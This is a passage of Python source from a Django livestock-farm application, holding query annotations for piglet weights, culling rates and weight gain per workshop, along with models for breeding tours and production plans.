data[f'week_weight_avg_{place_formatted}'] = Coalesce(Subquery(weights_subquery_avg_weight, output_field=models.FloatField()), 0.0) # qnty weights weights_subquery_qnty_weight = weights_subquery.annotate(qnty_weight=Sum('piglets_quantity')) \ .values('qnty_weight') data[f'week_weight_qnty_{place_formatted}'] = Coalesce(Subquery(weights_subquery_qnty_weight, output_field=models.IntegerField()), 0) weights_subquery_count_weight = weights_subquery.annotate(count_weight=Count('*')) \ .values('count_weight') data[f'week_weight_count_{place_formatted}'] = Subquery(weights_subquery_count_weight, output_field=models.IntegerField()) return self.annotate(**data) def add_week_weight_ws8_v2(self): # avg by week_tour weights_subquery = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place__in=['8/5', '8/6', '8/7']) \ .values('week_tour') weights_subquery_avg_weight = weights_subquery.annotate(avg_weight=Avg('average_weight')) \ .values('avg_weight') return self.annotate( week_weight_qnty_ws8=F('week_weight_qnty_8_5') + F('week_weight_qnty_8_6') + \ F('week_weight_qnty_8_7'), week_weight_avg_ws8=Coalesce(Subquery(weights_subquery_avg_weight, output_field=models.FloatField()), 0.0) ) def add_weighing_first_dates(self): data = dict() for place in ['3/4', '4/8', '8/5', '8/6', '8/7']: place_formatted = place.replace('/', '_') first_date_weights_subquery = Subquery(piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place=place) \ .order_by('date') \ .values('date__date')[:1], output_field=models.DateTimeField()) data[f'first_date_{place_formatted}'] = first_date_weights_subquery data['first_date_spec'] = Subquery(piglets_events.models.CullingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), culling_type='spec') \ .order_by('date') \ .values('date__date')[:1], output_field=models.DateTimeField()) return self.annotate(**data) def add_culling_data_by_week_tour(self, ws_numbers=[3, 4, 5, 6, 7, 8]): data = dict() for ws_number in ws_numbers: for c_type in ['padej', 'prirezka', 'vinuzhd', 'spec']: culling_subquery = piglets_events.models.CullingPiglets.objects \ .filter( culling_type=c_type, week_tour__pk=OuterRef('pk') ).filter( Q( Q(location__workshop__number=ws_number) | Q(location__pigletsGroupCell__workshop__number=ws_number) | Q(location__section__workshop__number=ws_number) | Q(location__sowAndPigletsCell__workshop__number=ws_number) ) ) culling_subquery_qnty = culling_subquery \ .values('culling_type') \ .annotate(culling_qnty=Sum('quantity')) \ .values('culling_qnty') data[f'ws{ws_number}_{c_type}_quantity'] = Coalesce( Subquery(culling_subquery_qnty, output_field=models.IntegerField()), 0) if ws_number in [5, 6, 7]: if c_type == 'prirezka': continue if c_type == 'spec': culling_subquery_avg_weight = culling_subquery \ .values('culling_type') \ .annotate(culling_avg_weight=Avg(F('total_weight') / F('quantity'), output_field=models.FloatField())) \ .values('culling_avg_weight') data[f'ws{ws_number}_{c_type}_avg_weight'] = Coalesce( Subquery(culling_subquery_avg_weight, output_field=models.FloatField()), 0.0) return self.annotate(**data) @staticmethod def gen_places_from_ws_number(ws_numbers): places = list() if 4 in ws_numbers: places.append('3_4') if 8 in ws_numbers: places.append('4_8') if 5 in ws_numbers: places.append('8_5') if 6 in ws_numbers: places.append('8_6') if 7 in ws_numbers: places.append('8_7') return places # to delete def add_culling_percentage(self, ws_numbers=[3, 4, 5, 6, 7, 8]): data = dict() places = self.gen_places_from_ws_number(ws_numbers=ws_numbers) if 3 in ws_numbers: data['ws3_padej_percentage'] = Case( When(Q(total_born_alive__isnull=True) | Q(total_born_alive=0), then=0.0), When(total_born_alive__gt=0, then=ExpressionWrapper( F('ws3_padej_quantity') * 100.0 / F('total_born_alive'), output_field=models.FloatField()) ), output_field=models.FloatField() ) data['ws3_prirezka_percentage'] = Case( When(Q(total_born_alive__isnull=True) | Q(total_born_alive=0), then=0.0), When(total_born_alive__gt=0, then=ExpressionWrapper( F('ws3_prirezka_quantity') * 100.0 / F('total_born_alive'), output_field=models.FloatField()) ), output_field=models.FloatField() ) ws_numbers.remove(3) for ws_number, place_number in zip(ws_numbers, places): if ws_numbers == 3: continue lookup1 = {f'week_weight_qnty_{place_number}__isnull': True, } lookup2 = {f'week_weight_qnty_{place_number}': 0, } lookup3 = {f'week_weight_qnty_{place_number}__gt': 0, } data[f'ws{ws_number}_padej_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_padej_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) data[f'ws{ws_number}_vinuzhd_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_vinuzhd_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) if ws_number in [4, 8]: data[f'ws{ws_number}_prirezka_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_prirezka_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) return self.annotate(**data) def add_culling_percentage_by_ws3(self): data = dict() data['ws3_padej_percentage'] = Case( When(Q(total_born_alive__isnull=True) | Q(total_born_alive=0), then=0.0), When(total_born_alive__gt=0, then=ExpressionWrapper( F('ws3_padej_quantity') * 100.0 / F('total_born_alive'), output_field=models.FloatField()) ), output_field=models.FloatField() ) data['ws3_prirezka_percentage'] = Case( When(Q(total_born_alive__isnull=True) | Q(total_born_alive=0), then=0.0), When(total_born_alive__gt=0, then=ExpressionWrapper( F('ws3_prirezka_quantity') * 100.0 / F('total_born_alive'), output_field=models.FloatField()) ), output_field=models.FloatField() ) return self.annotate(**data) def add_culling_percentage_by_ws_exclude_ws3(self, ws_number, place_number): lookup1 = {f'week_weight_qnty_{place_number}__isnull': True, } lookup2 = {f'week_weight_qnty_{place_number}': 0, } lookup3 = {f'week_weight_qnty_{place_number}__gt': 0, } data = dict() data[f'ws{ws_number}_padej_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_padej_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) data[f'ws{ws_number}_vinuzhd_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_vinuzhd_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) if ws_number in [4, 8]: data[f'ws{ws_number}_prirezka_percentage'] = Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( F(f'ws{ws_number}_prirezka_quantity') * 100.0 / F(f'week_weight_qnty_{place_number}'), output_field=models.FloatField()) ), output_field=models.FloatField() ) return self.annotate(**data) def add_culling_percentage_otkorm(self): lookup1 = {f'week_weight_qnty_ws8__isnull': True, } lookup2 = {f'week_weight_qnty_ws8': 0, } lookup3 = {f'week_weight_qnty_ws8__gt': 0, } return self.annotate( otkorm_padej_qnty=F('ws5_padej_quantity') + F('ws6_padej_quantity') + \ F('ws7_padej_quantity'), otkorm_vinuzhd_qnty=F('ws5_vinuzhd_quantity') + F('ws6_vinuzhd_quantity') + \ F('ws7_vinuzhd_quantity'), otkorm_padej_percentage=Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( (F('ws5_padej_quantity') + F('ws6_padej_quantity') + F('ws7_padej_quantity')) \ * 100.0 / F('week_weight_qnty_ws8'), output_field=models.FloatField() ) ) ), otkorm_vinuzhd_percentage=Case( When(Q(**lookup1) | Q(**lookup2), then=0.0), When(**lookup3, then=ExpressionWrapper( (F('ws5_vinuzhd_quantity') + F('ws6_vinuzhd_quantity') + F('ws7_vinuzhd_quantity')) \ * 100.0 / F('week_weight_qnty_ws8'), output_field=models.FloatField() ) ) ), ) def add_sow_events(self, sow): return self.prefetch_related( Prefetch( 'semination_set', queryset=events_models.Semination.objects.filter(sow=sow), to_attr='sow_semination' ), Prefetch( 'ultrasound_set', queryset=events_models.Ultrasound.objects.filter(sow=sow), to_attr='sow_ultrasound' ), Prefetch( 'sowfarrow_set', queryset=events_models.SowFarrow.objects.filter(sow=sow), to_attr='sow_farrow' ), Prefetch( 'weaningsow_set', queryset=events_models.WeaningSow.objects.filter(sow=sow), to_attr='sow_weaning' ), ) def add_remont_trs_out(self, ws_numbers=[5, 6, 7]): data = dict() for ws_number in ws_numbers: data[f'ws{ws_number}_remont'] = Subquery( self.filter( piglets_transactions__week_tour__pk=OuterRef('pk'), piglets_transactions__to_location__workshop__number=2, piglets_transactions__from_location__pigletsGroupCell__workshop__number=ws_number, ) \ .values('piglets_transactions__week_tour') \ .annotate(ws_remont_total=Sum('piglets_transactions__quantity')) .values('ws_remont_total')) if ws_numbers == [5, 6, 7]: data['count_remont_total'] = Subquery( self.filter(piglets_transactions__week_tour__pk=OuterRef('pk'), piglets_transactions__to_location__workshop__number=2) \ .values('piglets_transactions__week_tour') \ .annotate(remont_total=Sum('piglets_transactions__quantity')) .values('remont_total')) return self.annotate(**data) def add_remont_to_sows(self, ws_numbers=[5, 6, 7]): data = dict() for ws_number in ws_numbers: data[f'ws{ws_number}_remont'] = Subquery(events_models.PigletsToSowsEvent.objects \ .filter(metatour__week_tour__pk=OuterRef('pk'), piglets__location__pigletsGroupCell__workshop__number=ws_number) \ .values('metatour__week_tour') \ .annotate(ws_remont_total=Sum('quantity')) \ .values('ws_remont_total')) if ws_numbers == [5, 6, 7]: data['count_remont_total'] = events_models.PigletsToSowsEvent.objects \ .filter(metatour__week_tour__pk=OuterRef('pk'), piglets__location__pigletsGroupCell__workshop__number__in=[5,6,7]) \ .values('metatour__week_tour') \ .annotate(remont_total=Sum('quantity')) \ .values('remont_total') return self.annotate(**data) def add_remont_to_sows_otkorm_all(self): return self.annotate(count_remont_total=Coalesce(Subquery( events_models.PigletsToSowsEvent.objects \ .filter(metatour__week_tour__pk=OuterRef('pk')) \ .values('metatour__week_tour') \ .annotate(remont_total=Sum('quantity')) \ .values('remont_total')), 0) ) @staticmethod def get_place_formatted(places): if len(places) == 1: return places[0].replace('/', '_') else: return 'ws8' @staticmethod def sv_avg_ave_expr(): return ExpressionWrapper( Sum( ExpressionWrapper( F('piglets_age') * F('quantity'), output_field=models.FloatField()) ) / Sum('quantity'), output_field=models.FloatField() ) def subquery_sv_age_at_place(self, places): place_formatted = self.get_place_formatted(places=places) ann_data = {f'weight_sv_avg_age_{place_formatted}':ExpressionWrapper( Sum( ExpressionWrapper( F('piglets_age') * F('piglets_quantity'), output_field=models.FloatField()) ) / Sum('piglets_quantity'), output_field=models.FloatField() ) } return piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place__in=places ).values('week_tour') \ .annotate(**ann_data) \ .values(f'weight_sv_avg_age_{place_formatted}') def subquery_total2_place(self, places): place_formatted = self.get_place_formatted(places=places) ann_data = {f'total2_{place_formatted}': Sum('total_weight')} return piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place__in=places ).values('week_tour') \ .annotate(**ann_data) \ .values(f'total2_{place_formatted}') def subquery_avg_place(self, places): place_formatted = self.get_place_formatted(places=places) ann_data = {f'avg_{place_formatted}': Avg('average_weight')} return piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place__in=places ).values('week_tour') \ .annotate(**ann_data) \ .values(f'avg_{place_formatted}') def add_prives_prepare(self, places=['3/4', '4/8', '8/5', '8/6', '8/7']): data = dict() for place in places: place_formatted = place.replace('/', '_') data[f'sv_age_{place_formatted}'] = self.subquery_sv_age_at_place([place]) data[f'total2_{place_formatted}'] = self.subquery_total2_place([place]) if '8/5' in places or '8/6' in places or '8/7' in places: data['sv_age_ws8'] = self.subquery_sv_age_at_place(['8/5', '8/6', '8/7']) data['total2_ws8'] = self.subquery_total2_place(['8/5', '8/6', '8/7']) return self.annotate(**data) def add_prives_prepare_otkorm_weight_data_without_remont(self, ws_numbers=[5, 6, 7]): data = dict() for ws_number in ws_numbers: data[f'total3_8_{ws_number}'] = ExpressionWrapper( F(f'week_weight_8_{ws_number}') - \ (F(f'ws{ws_number}_remont') * F(f'week_weight_avg_8_{ws_number}')), output_field=models.FloatField() ) return self.annotate(**data) def add_prives_prepare_otkorm_without_remont_all_ws(self, weight_total_label, weight_avg_label, remont_label): data = dict() data['total3'] = ExpressionWrapper( F(weight_total_label) - \ (F(remont_label) * F(weight_avg_label)), output_field=models.FloatField() ) return self.annotate(**data) def add_prives_prepare_spec(self, ws_numbers=[5, 6, 7]): data = dict() for ws_number in ws_numbers: subquery_age = Subquery(piglets_events.models.CullingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), culling_type='spec', location__pigletsGroupCell__workshop__number=ws_number, ) \ .values('week_tour') \ .annotate(spec_sv_avg_age=ExpressionWrapper( Sum( ExpressionWrapper( F('piglets_age') * F('quantity'), output_field=models.FloatField()) ) / Sum('quantity'), output_field=models.FloatField() )) \ .values('spec_sv_avg_age')) subquery_weight_total = Subquery(piglets_events.models.CullingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), culling_type='spec', location__pigletsGroupCell__workshop__number=ws_number, ) \ .values('week_tour') \ .annotate(spec_prives_total_weight=Sum('total_weight')) \ .values('spec_prives_total_weight')) data[f'spec_sv_avg_age_ws{ws_number}'] = subquery_age data[f'spec_weight_total_ws{ws_number}'] = subquery_weight_total return self.annotate(**data) def add_prives_prepare_spec_all_otkorm(self): data = dict() subquery_age = Subquery(piglets_events.models.CullingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), culling_type='spec', ) \ .values('week_tour') \ .annotate(spec_sv_avg_age=ExpressionWrapper( Sum( ExpressionWrapper( F('piglets_age') * F('quantity'), output_field=models.FloatField()) ) / Sum('quantity'), output_field=models.FloatField() )) \ .values('spec_sv_avg_age')) data[f'spec_sv_avg_age_otkorm'] = subquery_age return self.annotate(**data) @staticmethod def gen_prives_otkorm(ws_number): return \ (F(f'spec_weight_total_ws{ws_number}') - F(f'total2_8_{ws_number}')) / \ (F(f'spec_sv_avg_age_ws{ws_number}') - F(f'sv_age_8_{ws_number}')), \ (F(f'spec_weight_total_ws{ws_number}') - F(f'total3_8_{ws_number}')) / \ (F(f'spec_sv_avg_age_ws{ws_number}') - F(f'sv_age_8_{ws_number}')) @staticmethod def gen_prives_otkorm_all(ws_number): return \ (F(f'spec_weight_total_ws{ws_number}') - F(f'total3_8_{ws_number}')) / \ (F(f'spec_sv_avg_age_ws{ws_number}') - F(f'sv_age_8_{ws_number}')) def add_prives(self, ws_numbers=[3, 4, 8, 5, 6, 7]): data = dict() prives_prepare_places = [] prives_prepare_spec_places = [] if 3 in ws_numbers: data['prives_3'] = (F('total2_3_4') / F('sv_age_3_4')) prives_prepare_places.append('3/4') if 4 in ws_numbers: data['prives_4'] = (F('total2_4_8') - F('total2_3_4')) / (F('sv_age_4_8') - F('sv_age_3_4')) prives_prepare_places.append('4/8') prives_prepare_places.append('3/4') if 8 in ws_numbers: data['prives_8'] = (F('total2_ws8') - F('total2_4_8')) / (F('sv_age_ws8') - F('sv_age_4_8')) prives_prepare_places.append('4/8') prives_prepare_places.append('8/5') if 5 in ws_numbers: data['prives_5'], data['prives_without_remont_5'] = \ self.gen_prives_otkorm(ws_number=5) prives_prepare_places.append('8/5') prives_prepare_spec_places.append(5) if 6 in ws_numbers: data['prives_6'], data['prives_without_remont_6'] = \ self.gen_prives_otkorm(ws_number=6) prives_prepare_places.append('8/6') prives_prepare_spec_places.append(6) if 7 in ws_numbers: data['prives_7'], data['prives_without_remont_7'] = \ self.gen_prives_otkorm(ws_number=7) prives_prepare_places.append('8/7') prives_prepare_spec_places.append(7) return self.add_prives_prepare(places=prives_prepare_places) \ .add_prives_prepare_spec(ws_numbers=prives_prepare_spec_places) \ .add_prives_prepare_otkorm_weight_data_without_remont(ws_numbers=prives_prepare_spec_places) \ .annotate(**data) def add_prives_all_otkorm_for_dashboard(self): return self.add_remont_to_sows_otkorm_all() \ .annotate( sv_age_ws8=self.subquery_sv_age_at_place(places=['8/5', '8/6','8/7']), total2_ws8=self.subquery_total2_place(places=['8/5', '8/6', '8/7']), avg_ws8=self.subquery_avg_place(places=['8/5', '8/6', '8/7']) ) \ .add_prives_prepare_spec_all_otkorm() \ .add_prives_prepare_otkorm_without_remont_all_ws( weight_total_label='total2_ws8', weight_avg_label='avg_ws8', remont_label='count_remont_total' ) \ .annotate(prives=Round( (F('weaning_total_weight') - F('total3')) / (F('spec_sv_avg_age_otkorm') - F('sv_age_ws8')) ) ) \ .annotate(prives_na_1g=Round(ExpressionWrapper(F('prives') * 1000 / F('weaning_quantity'), output_field=models.FloatField()))) @staticmethod def gen_prives_otkorm_na_1g(ws_number): return \ ExpressionWrapper( F(f'prives_{ws_number}') * 1000 / F(f'ws{ws_number}_spec_quantity'), output_field=models.FloatField()), \ ExpressionWrapper( F(f'prives_without_remont_{ws_number}') * 1000 / F(f'ws{ws_number}_spec_quantity'), output_field=models.FloatField()) def add_prives_na_1g(self, ws_numbers=[3, 4, 8, 5, 6, 7]): data = dict() if 3 in ws_numbers: data['prives_1g_3'] = ExpressionWrapper( F('prives_3') * 1000 / F('week_weight_qnty_3_4'), output_field=models.FloatField()) if 4 in ws_numbers: data['prives_1g_4'] = ExpressionWrapper( F('prives_4') * 1000 / F('week_weight_qnty_4_8'), output_field=models.FloatField()) if 8 in ws_numbers: data['prives_1g_8'] = ExpressionWrapper( F('prives_8') * 1000 / F('week_weight_qnty_ws8'), output_field=models.FloatField()) if 5 in ws_numbers: data['prives_1g_5'], data['prives_without_remont_1g_5'] = \ self.gen_prives_otkorm_na_1g(ws_number=5) if 6 in ws_numbers: data['prives_1g_6'], data['prives_without_remont_1g_6'] = \ self.gen_prives_otkorm_na_1g(ws_number=6) if 7 in ws_numbers: data['prives_1g_7'], data['prives_without_remont_1g_7'] = \ self.gen_prives_otkorm_na_1g(ws_number=7) return self.annotate(**data) def add_prives_na_1g_by_ws348(self, ws_number, week_weight_label=None): if not week_weight_label: week_weight_label = 'week_weight_qnty_3_4' data = dict() data[f'prives_1g_{ws_number}'] = ExpressionWrapper( F(f'prives_{ws_number}') * 1000 / F(week_weight_label), output_field=models.FloatField()) return self.annotate(**data) def add_dates_ws1_2(self): first_semination_date = self.filter(semination__tour__pk=OuterRef('pk')) \ .values('semination__date__date').order_by('semination__date')[:1] last_farrow_date = self.filter(sowfarrow__tour__pk=OuterRef('pk')) \ .values('sowfarrow__date__date').order_by('-sowfarrow__date')[:1] return self.annotate(first_semination_date=Subquery(first_semination_date), last_farrow_date=Subquery(last_farrow_date)) def add_dates_ws3(self): first_farrow_date = self.filter(sowfarrow__tour__pk=OuterRef('pk')) \ .values('sowfarrow__date__date').order_by('sowfarrow__date')[:1] last_weight_out_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place='3/4').order_by('-date') \ .values('date__date')[:1] return self.annotate(first_farrow_date=Subquery(first_farrow_date), ws3_last_weight_out_date=Subquery(last_weight_out_date)) def add_dates_ws4(self): first_weight_in_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place='3/4').order_by('date') \ .values('date__date')[:1] last_weight_out_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place='4/8').order_by('-date') \ .values('date__date')[:1] return self.annotate(ws4_first_weight_in_date=Subquery(first_weight_in_date), ws4_last_weight_out_date=Subquery(last_weight_out_date)) def add_dates_ws8(self): first_weight_in_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place='4/8').order_by('date') \ .values('date__date')[:1] last_weight_out_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place__in=['8/5','8/6','8/7']).order_by('-date') \ .values('date__date')[:1] return self.annotate(ws8_first_weight_in_date=Subquery(first_weight_in_date), ws8_last_weight_out_date=Subquery(last_weight_out_date)) def add_dates_ws_otkorm(self, ws_number): place = f'8/{ws_number}' first_weight_in_date = piglets_events.models.WeighingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), place=place).order_by('date') \ .values('date__date')[:1] last_spec_date = piglets_events.models.CullingPiglets.objects.filter( week_tour__pk=OuterRef('pk'), culling_type='spec', location__pigletsGroupCell__workshop__number=ws_number, ).order_by('-date') \ .values('date__date')[:1] data = dict() data[f'ws{ws_number}_first_weight_in_date'] = Subquery(first_weight_in_date) data[f'ws{ws_number}_last_spec_date'] = Subquery(last_spec_date) return self.annotate(**data) def add_weights_for_dashboard_chart_ws348(self, places): weights_subquery = piglets_events.models.WeighingPiglets.objects \ .filter(place__in=places, week_tour__pk=OuterRef('pk')) \ .values('week_tour') return self.annotate( weaning_quantity=Subquery( weights_subquery.annotate(qnty=Sum('piglets_quantity')).values('qnty')), weaning_total_weight=Round(Subquery( weights_subquery.annotate(total=Sum('total_weight')).values('total')), precision=2), weaning_avg_weight=Round(Subquery( weights_subquery.annotate(avg_w=Avg('average_weight')).values('avg_w')), precision=2), ) def add_spec_for_dashboard_chart_ws_otkorm(self): weights_subquery = piglets_events.models.CullingPiglets.objects \ .filter(culling_type='spec', week_tour__pk=OuterRef('pk')) \ .values('week_tour') return self.annotate( weaning_quantity=Subquery( weights_subquery.annotate(qnty=Sum('quantity')).values('qnty')), weaning_total_weight=Round(Subquery( weights_subquery.annotate(total=Sum('total_weight')).values('total')), precision=2), weaning_avg_weight=Round(Subquery( weights_subquery.annotate(avg_w=Avg('avg_weight')).values('avg_w'))), ) def add_ws_piglets_income_for_dashboard_chart(self, subdivision): if subdivision == 3: return self.annotate( alive_piglets_for_safety=Sum('sowfarrow__alive_quantity') ) places = [] if subdivision == 4: places = ['3/4'] if subdivision == 8: places = ['4/8'] if subdivision == '_otkorm': places = ['8/5', '8/6', '8/7'] weights_subquery = piglets_events.models.WeighingPiglets.objects \ .filter(place__in=places, week_tour__pk=OuterRef('pk')) \ .values('week_tour') \ .annotate(qnty=Sum('piglets_quantity')) \ .values('qnty') return self.annotate( alive_piglets_for_safety=Subquery(weights_subquery), ) def add_ws_piglets_culling_for_dashboard_chart(self, cull_locs): subquery = Subquery(piglets_events.models.CullingPiglets.objects \ .filter(location__in=cull_locs, week_tour__pk=OuterRef('pk')) \ .exclude(culling_type='spec') \ .values('week_tour') \ .annotate(piglets_culling_quantity=Sum('quantity')) \ .values('piglets_culling_quantity')) return self.annotate( piglets_culling_quantity=Coalesce(subquery, 0), ) def add_ws_piglets_culling_percentage_for_dashboard_chart(self): return self.annotate(culling_percentage=CustomRound(Coalesce(ExpressionWrapper( F('piglets_culling_quantity') * 100.0 / F('alive_piglets_for_safety'), output_field=models.FloatField()), 0.0))) \ .annotate(safety_percentage=ExpressionWrapper(100.0 - F('culling_percentage'), output_field=models.FloatField())) def add_ws_piglets_plan_data_for_dashboard_chart(self, subdivision): return self.annotate( plan_safety=F(f'plan__ws{subdivision}_safety'), plan_weaning_qnty=ExpressionWrapper(F('alive_piglets_for_safety') \ * F(f'plan__ws{subdivision}_safety') / 100, output_field=models.FloatField()), plan_culling_percentage=ExpressionWrapper( 100.0 - F(f'plan__ws{subdivision}_safety'), output_field=models.FloatField()), plan_avg_weight=F(f'plan__ws{subdivision}_av_weight'), plan_total_weight=ExpressionWrapper( F(f'plan__ws{subdivision}_av_weight') * (F('alive_piglets_for_safety') \ * F(f'plan__ws{subdivision}_safety') / 100), output_field=models.FloatField()) ) def add_seminated_count_for_dashboard_chart(self): # sem_subquery = events_models.Semination.objects.filter(tour_pk=OuterRef('pk'))\ # .values('tour') return self.annotate( count_seminated=Coalesce(Count('semination__sow', distinct=True), 0), ) def add_farrow_data_for_dashboard_chart(self): farrow_subquery = events_models.SowFarrow.objects.filter(tour__pk=OuterRef('pk'))\ .values('tour') return self.annotate( alive_count=Subquery( farrow_subquery.annotate(alive_count=Sum('alive_quantity')).values('alive_count')), count_farrows=Subquery( farrow_subquery.annotate(count_farrows=Count('sow')).values('count_farrows')), ).annotate(av_priplod=F('alive_count') / F('count_farrows')) def add_sows_plan_data_for_dashboard_chart(self): return self.annotate( plan_seminations=F('plan__ws12_seminations'), plan_farrow_percent=F('plan__ws12_farrow_percent'), plan_av_priplod=F('plan__ws12_av_priplod'), ).annotate( plan_born_alive=ExpressionWrapper(( F('plan_seminations') * F('plan_farrow_percent') / 100) * \ F('plan_av_priplod'), output_field=models.FloatField()) ) class TourManager(CoreModelManager): def get_queryset(self): return TourQuerySet(self.model, using=self._db) def get_monday_date_by_week_number(self, week_number, year): start_week_number_pre = str(year) + '-W' + str(week_number) return datetime.datetime.strptime(start_week_number_pre + '-1', "%Y-W%W-%w") def get_or_create_by_week(self, week_number, year, start_date=None): if not start_date: # start_date=timezone.now() start_date = self.get_monday_date_by_week_number(week_number=week_number, year=year) tour = self.get_queryset().filter(week_number=week_number, year=year).first() if not tour: tour = self.create(start_date=start_date, week_number=week_number, year=year) return tour def get_or_create_by_week_with_plan(self, week_number, year, start_date=None): tour = self.get_or_create_by_week(week_number=week_number, year=year, start_date=start_date) TourPlan.objects.assign_plan_to_tour(tour=tour) return tour def get_or_create_by_week_in_current_year(self, week_number): return self.get_or_create_by_week(week_number, timezone.now().year) def get_tour_by_week_in_current_year(self, week_number): return self.get_queryset().filter(week_number=week_number, year=timezone.now().year).first() # for Import_From_Farm mechanism def create_or_return_by_raw(self, raw_tour, start_date=None): week_number = int(raw_tour[2:]) year = int('20' + raw_tour[:2]) if not start_date: start_date = self.get_monday_date_by_week_number(week_number, year) return self.get_or_create_by_week_with_plan(week_number, year, start_date) def create_tour_from_farrow_date_string(self, farrow_date, days=135): semination_date = datetime.datetime.strptime(farrow_date, '%Y-%m-%d') \ - datetime.timedelta(days) week_number = int(semination_date.strftime("%V")) return self.get_or_create_by_week(week_number, semination_date.year, semination_date) def get_tours_by_piglets(self, piglets): return self.get_queryset().filter(metatourrecords__metatour__piglets__in=piglets).distinct() def get_week_tours_by_piglets(self, piglets): return self.get_queryset().filter(id__in=piglets.values_list('metatour__week_tour', flat=True)) class Tour(CoreModel): start_date = models.DateTimeField() week_number = models.IntegerField() year = models.IntegerField() objects = TourManager() def __str__(self): return "Тур {} {}г".format(self.week_number, self.year) @property def days_left_from_farrow_approx(self): return timezone.now() - (self.start_date + datetime.timedelta(days=135)) @property def days_left_from_farrow(self): if self.sowfarrow_set.all().first(): return timezone.now() - self.sowfarrow_set.all().first().date return None class MetaTourManager(CoreModelManager): pass class MetaTour(CoreModel): piglets = models.OneToOneField('piglets.Piglets', on_delete=models.CASCADE) week_tour = models.ForeignKey(Tour, on_delete=models.SET_NULL, null=True, related_name='week_tours') objects = MetaTourManager() def __str__(self): return 'Piglets {} MetaTour {}'.format(self.piglets, self.pk) def records_repr(self): return [{ 'tour': record.tour.week_number, 'percentage': round(record.percentage, 2), 'quantity': round(record.quantity, 2), 'days_left_from_farrow_approx': str((record.tour.days_left_from_farrow_approx).days), 'days_left_from_farrow': str((record.tour.days_left_from_farrow).days) if record.tour.days_left_from_farrow else None } for record in self.records.all()] def set_week_tour(self): record = self.records.all().order_by('-percentage', 'tour__year', 'tour__week_number').first() if record: self.week_tour = record.tour self.save() class MetaTourRecordQuerySet(models.QuerySet): def sum_quantity_by_tour(self, tour): return self.filter(tour=tour).aggregate(models.Sum('quantity'))['quantity__sum'] def get_set_of_tours(self): return Tour.objects.filter(metatourrecords__in=self).distinct() class MetaTourRecordManager(CoreModelManager): def get_queryset(self): return MetaTourRecordQuerySet(self.model, using=self._db) def create_record(self, metatour, tour, quantity, total_quantity, percentage=None): if not percentage: percentage = (quantity * 100) / total_quantity note = '' if percentage > 100: percentage = 100 note = f'Новая версия. Неверно подсчитались проценты {percentage}, \ у группы с количеством {metatour.piglets.quantity}, \ Данные : тур={tour.week_number}, quantity={quantity}, total_quantity={total_quantity}, \ percentage={percentage}. Проценты изменены на 100. \ ID piglets {metatour.piglets.pk}, piglets.quantty={metatour.piglets.quantity}, \ piglets.quantty={metatour.piglets.start_quantity},' return self.create(metatour=metatour, tour=tour, quantity=quantity, percentage=percentage, note=note) def recount_records_by_total_quantity(self, new_total_quantity): self.get_queryset().update(quantity=(models.F('percentage') * new_total_quantity / 100)) class MetaTourRecord(CoreModel): metatour = models.ForeignKey(MetaTour, on_delete=models.CASCADE, related_name='records') tour = models.ForeignKey(Tour, on_delete=models.CASCADE, related_name='metatourrecords') quantity = models.FloatField() percentage = models.FloatField() note = models.TextField(default='') objects = MetaTourRecordManager() class Meta: ordering = ['tour', ] def __str__(self): return 'MetaTourRecord {} {}'.format(self.pk, self.tour) def increase_quantity(self, amount): self.quantity += amount self.save() class TourPlanQuerySet(models.QuerySet): @staticmethod def get_places(ws): places = list() if ws == 4: places = ['3/4'] if ws == 8: places = ['4/8'] if ws == '_otkorm': places = ['8/5', '8/6', '8/7'] return places def get_or_create_plan(self, week_number, year): plan = self.filter(week_number=week_number, year=year).first() if not plan: plan = self.filter(default=True).first() plan.pk = None plan.default = False plan.week_number = week_number plan.year = year plan.save() return plan def assign_plan_to_tour(self, tour): plan = self.get_or_create_plan(week_number=tour.week_number, year=tour.year) plan.tour = tour plan.save() return plan def add_income_quantity_and_total_from_farrows(self): subquery = events_models.SowFarrow.objects.filter(tour=OuterRef('tour')) \ .values('tour') \ .annotate(alive_count=Sum('alive_quantity')) \ .values('alive_count') return self.annotate(count_income=ExpressionWrapper( Coalesce( Round( Subquery(subquery) * F('ws3_safety') / 100.0, precision=0 ), 0), output_field=models.IntegerField()), 